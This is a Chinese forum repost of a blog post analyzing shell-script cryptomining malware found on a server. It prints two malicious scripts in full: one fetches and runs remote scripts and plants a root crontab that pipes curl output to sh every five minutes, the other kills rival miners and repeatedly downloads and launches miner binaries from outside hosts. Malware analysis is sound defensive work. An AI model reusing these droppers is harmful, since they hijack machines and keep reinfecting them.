找回密码
 立即注册

QQ登录

只需一步,快速开始

PSqzXuXs8e8Iv78M.jpg
本日,群里有朋侪@我,说服务器中病毒了,让帮助检察下一下的脚本。自己,对于shell脚本下的病毒照旧很感爱好的,于是就分析了下脚本。
#!/bin/bashSHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin#export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin#chmod +x /tmp/hawk && ps auxf | grep -v grep | grep hawk || nohup /tmp/hawk >/dev/null 2>&1 &rm -rf /tmp/config.txtwhoami=$( whoami )if [ ${whoami}x != "root"x ];thencurl http://abcde.sw5y.com/l2/lowerv2.sh > /tmp/lower.shchmod 777 /tmp/lower.shnohup bash /tmp/lower.sh >/dev/null 2>&1 &if [ ! -f "/tmp/lower.sh" ] ;thenwget -P /tmp/ http://abcde.sw5y.com/l2/lowerv2.shrm /tmp/lower.sh.*rm /tmp/lowerv2.sh.*fichmod 777 /tmp/lowerv2.shnohup bash /tmp/lowerv2.sh >/dev/null 2>&1 &elseecho "*/5 * * * * curl -sL http://x.co/6nPMR | sh" > /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "*/5 * * * * curl -sL http://x.co/6nPMR | sh" > /var/spool/cron/crontabs/rootcurl http://abcde.sw5y.com/l2/rootv2.sh > /tmp/root.shchmod 777 /tmp/root.shnohup bash /tmp/root.sh>/dev/null 2>&1 &if [ ! -f "/tmp/root.sh" ] ;thenwget -P /tmp/ http://abcde.sw5y.com/l2/rootv2.shrm /tmp/root.sh.*rm /tmp/rootv2.sh.*fichmod 777 /tmp/rootv2.shnohup bash /tmp/rootv2.sh >/dev/null 2>&1 &fi这个脚本大抵分析下,无非是判定用户不为空不是root的话,且假如不存在/tmp/lower.sh文件就下载运行。假如是root用户,就写crontab筹划使命每5分钟下载一次脚本。并将脚本重定向到/tmp/root.sh下实行。
那么这个不停被夸大下载的rootv2.sh是什么内容呢?
#!/bin/bashSHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binfunction kills() {pkill -f sourplumpkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYgrm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_geniusrm -rf /tmp/*index_bak*rm -rf /tmp/*httpd.conf*rm -rf /tmp/*httpd.confrm -rf /tmp/a7b104c270pkill -f AnXqV.yamps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9ps ax|grep -o './[0-9]* -c'| xargs pkill -fpkill -f biosetjenkinspkill -f Loopbackpkill -f apacehapkill -f cryptonightpkill -f stratumpkill -f mixnerdxpkill -f performedlpkill -f JnKihGjnpkill -f irqba2anc1pkill -f irqba5xnc1pkill -f irqbnc1pkill -f ir29xc1pkill -f connspkill -f irqbalancepkill -f crypto-poolpkill -f minexmrpkill -f XJnRjpkill -f NXLAipkill -f BI5zjpkill -f askdljlqwpkill -f minerdpkill -f minergatepkill -f Guard.shpkill -f ysaydhpkill -f bonnspkill -f donnspkill -f kxjdpkill -f Duck.shpkill -f bonn.shpkill -f conn.shpkill -f kworker34pkill -f kw.shpkill -f pro.shpkill -f polkitdpkill -f acpidpkill -f icb5opkill -f nopxipkill -f irqbalanc1pkill -f minerdpkill -f i586pkill -f gddrpkill -f mstxmrpkill -f ddg.2011pkill -f wnTKYgpkill -f deamonpkill -f disk_geniuspkill -f sourplumrm -rf /tmp/httpd.confrm -rf /tmp/connrm -rf /tmp/connsrm -f /tmp/irq.shrm -f /tmp/irqbalanc1rm -f /tmp/irqPORT_NUMBER=3333lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9PORT_NUMBER=5555lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9PORT_NUMBER=7777lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9PORT_NUMBER=14444lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9}function downloadyam() { if [ ! -f "/tmp/config.json" ]; then curl http://abcde.sw5y.com/l2/config.json -o /tmp/config.json && chmod +x /tmp/config.json if [ ! -f "/tmp/config.json" ]; then wget http://abcde.sw5y.com/l2/config.json -P /tmp && chmod +x /tmp/config.json rm -rf config.json.* fi fi if [ ! -f "/tmp/bashd" ]; then curl http://abcde.sw5y.com/l2/bashd -o /tmp/bashd && chmod +x /tmp/bashd if [ ! -f "/tmp/bashd" ]; then wget http://abcde.sw5y.com/l2/bashd -P /tmp && chmod +x /tmp/bashd rm -rf bashd.* fi nohup /tmp/bashd -p bashd>/dev/null 2>&1 & else p=$(ps aux | grep bashd | grep -v grep | wc -l) if [ ${p} -eq 1 ];then echo "bashd" elif [ ${p} -eq 0 ];then #nohup /tmp/bashd -p $(hostname)>/dev/null 2>&1 & nohup /tmp/bashd -p bashd>/dev/null 2>&1 & else echo "" fi fi sleep 15 p=$(ps aux | grep bashd | grep -v grep | wc -l) if [ ${p} -eq 1 ];then echo "bashd" elif [ ${p} -eq 0 ];then if [ ! -f "/tmp/pools.txt" ]; then curl http://abcde.sw5y.com/l2/pools.txt -o /tmp/pools.txt && chmod +x /tmp/pools.txt if [ ! -f "/tmp/pools.txt" ]; then wget http://abcde.sw5y.com/l2/pools.txt -P /tmp && chmod +x /tmp/pools.txt rm -rf pools.txt.* fi fi if [ ! -f "/tmp/bashe" ]; then curl http://abcde.sw5y.com/l2/bashe -o /tmp/bashe && chmod +x /tmp/bashe if [ ! -f "/tmp/bashe" ]; then wget http://abcde.sw5y.com/l2/bashe -P /tmp && chmod +x /tmp/bashe rm -rf bashe.* fi nohup /tmp/bashe -C /tmp/pools.txt>/dev/null 2>&1 & else p=$(ps aux | grep bashe | grep -v grep | wc -l) if [ ${p} -eq 1 ];then echo "bashe" elif [ ${p} -eq 0 ];then nohup /tmp/bashe -C /tmp/pools.txt>/dev/null 2>&1 & else echo "" fi fi else echo "" fi sleep 15 if [ ! -f "/tmp/Xagent" ]; then curl http://xmr.enjoytopic.tk/l3/Xagent -o /tmp/Xagent && chmod +x /tmp/Xagent if [ ! -f "/tmp/Xagent" ]; then wget http://xmr.enjoytopic.tk/l3/Xagent -P /tmp && chmod +x /tmp/Xagent rm -rf Xagent.* fi nohup /tmp/Xagent >/dev/null 2>&1 & else p=$(ps aux | grep Xagent | grep -v grep | wc -l) if [ ${p} -eq 1 ];then echo "Xagent" elif [ ${p} -eq 0 ];then nohup /tmp/Xagent >/dev/null 2>&1 & else echo "" fi fi}cd /tmp/while [ 1 ]do kills downloadyam sleep 600done这个脚本大抵看了下,一个kills函数和downloadyam函数,kills函数是删除各种服务,脚本。不看不知道,原来他还会下载这么多东西啊。关键是downloadyam函数,满满的都是各种恶意。一小时实行一遍删除然后下载,是为了什么呢?
分析效果
这个脚本很简朴,防备他是在/tmp/目次下创建lower.sh及rootv2.sh脚本,将第一个脚本删除。修改第二个脚本的while判定处,将downloadyam函数删除。
假如已经中病毒,那么就利用删除downloadyam函数的脚本实行就可以扫除病毒。
泉源:付生保个人博客
分享至 : QQ空间
收藏

1 个回复

倒序浏览
很想加人你们,等我发工资
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 立即注册